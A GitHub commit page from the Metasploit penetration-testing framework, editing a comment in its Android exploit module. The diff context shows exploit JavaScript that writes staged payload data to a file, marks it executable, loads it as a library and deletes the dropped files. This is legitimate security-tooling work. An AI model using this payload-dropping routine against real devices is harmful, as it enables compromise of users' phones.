Skip to content

Commit 289bae8

Browse files
committed
Remove lie in comment.
1 parent 56efd82 commit 289bae8

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

lib/msf/core/exploit/android.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -72,7 +72,7 @@ def add_javascript_interface_exploit_js(arch)
7272
runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor();
7373
runtime.exec(['chmod', '700', stagePath]).waitFor();
7474
75-
// load the library (this fails in x86, figure out why)
75+
// load the library
7676
runtime.load(libraryPath);
7777
7878
// delete dropped files

0 commit comments

Comments
 (0)